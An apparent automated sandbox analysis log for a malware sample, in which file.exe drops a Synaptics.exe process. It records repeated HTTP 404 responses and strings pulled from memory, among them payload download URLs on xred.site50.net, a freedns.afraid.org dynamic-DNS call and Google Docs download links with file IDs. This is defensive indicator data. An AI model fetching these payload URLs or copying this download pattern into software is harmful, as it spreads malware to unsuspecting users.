                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7WcKhp1LUAZoi2Pk8D9h_Wc_IfSHcez4_jVncRNQkjXtkG1Boyt3gPVK6JNACFf-ZJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:44 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mQOVI_DK2cCJxjn9b3fsnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KnL8DQyXgVYhc0WBgYGJA9s-QkBMW7-lgqFEMC5KZVkew_z4hpWkorJRGoVKa0_-FContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:44 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UiujMSDdO0r515-o2Wxxug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7H75kQ1oq0DhRWSnOaCngEEaftGMxnRxrnZ3aMA2Netfnmqb7aHpfVxqMSkHOwc6PyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:45 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ygiuSFCh1JHyzxrpHP2hDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4OX98FEbu99rrRT2_mwEd_on3555nJutX1FY5WhNlodM0fCF7otgV2MKlqvjiOMfTjZfQu1UAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:45 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nMjtv2hEanorqHxW2pSBuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5WXOrltfxYQoNW7rsoo6nbe6qbchiMwjcBIZx-ZKyOrU_jWegIvjc19GMgWlytkoACzA2t3xcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZaBY3iM4z61Dt2dwLYkeXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zDqxNlJffJbHHLPMX4UG4ep6mltqhYKkEJEoMnbjR2nilax58cTyR5cbXbP2FsmWoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-aNy2uUPAgve6DpAmPK4CJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC60D28hSnAjsFkqq_9YxQ39fWr1dBPjRInKTFQvR0dg9UJs9-G0wzkxZv93kvRQ01B_D0ZALoIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:48 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hh5O9EJKVo1I3i4JVAt-yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62u6T4_pHfn8DA2HGEuyahzKtFHksFt-c_HUzwAJfeQY_q7HOqhqBN9vCNkU4RJs4UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LQ0lPxpaC5DOXCwlfY1svA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6XZoDr-dgiBcux4BSNvCBT1S1etRy9rAqKdGnDSVj1AXQI7fCb6cKYmiJaNI7jyy4U_3rxuZIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:49 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-rlTm53GS8CrRuVrAE_1hWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ojtyPwIJws4gg0bYSFX04zrLNquL5_7qvbcDSEwmP6vxx0swZjcZjf97rgoGeJLaOkGNBttsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:50 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VumxtV6o_DNnUmkmGGqDbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jNYlhY9DK4eGdtIPBiEYRuSJ_DVxyus1FEtLxEoFz8ABSidZjZQ8r-I6q2rKXMvjrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:50 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-soWjeBb5dk9GdvDT8ECZgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6uvLnSJNJrjPnZyNP9f7Qdt5In1R6iaVJlDR38mWIZg15pB_Wxt0yWgZCJdizXDvrZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:11 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XQnCRtRqAFPodMi0yFq8Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978t
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmp, dxwsetup.exe, 00000006.00000003.1287300089.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, SET8EBB.tmp.6.drString found in binary or memory: http://www.BetaPlace.com
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.BetaPlace.com.?
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.BetaPlace.comEContinuare
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmp, dxwsetup.exe, 00000006.00000003.1287300089.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, SET8EBB.tmp.6.drString found in binary or memory: http://www.betaplace.com
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000003.1287300089.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, SET8EBB.tmp.6.drString found in binary or memory: http://www.betaplace.com.
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278195181.00000000002DD000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.betaplace.com.DInstalacn
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0&
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rard
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                          Source: Synaptics.exe, 00000004.00000002.2328156074.000000001037E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2339136007.000000001823E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2342635471.000000001AB7E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2332675683.0000000013B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2387768013.000000002C23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2404788593.000000003180E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2311064966.0000000009F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2409101981.00000000343CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2328752029.0000000010AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2336595033.000000001693E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2385424917.000000002AA7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2311639252.000000000A57E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2372888350.0000000022EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2378847290.00000000266FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2371526257.00000000220FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2373680857.000000002377E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2333567801.000000001467E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2328255888.00000000104BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2359687557.000000001E93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2384939557.000000002A57E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2405151199.0000000031BCE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399545647.000000002E4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2317609381.000000000D3BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#5
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#r
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$YL
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$s
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&L
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&expo
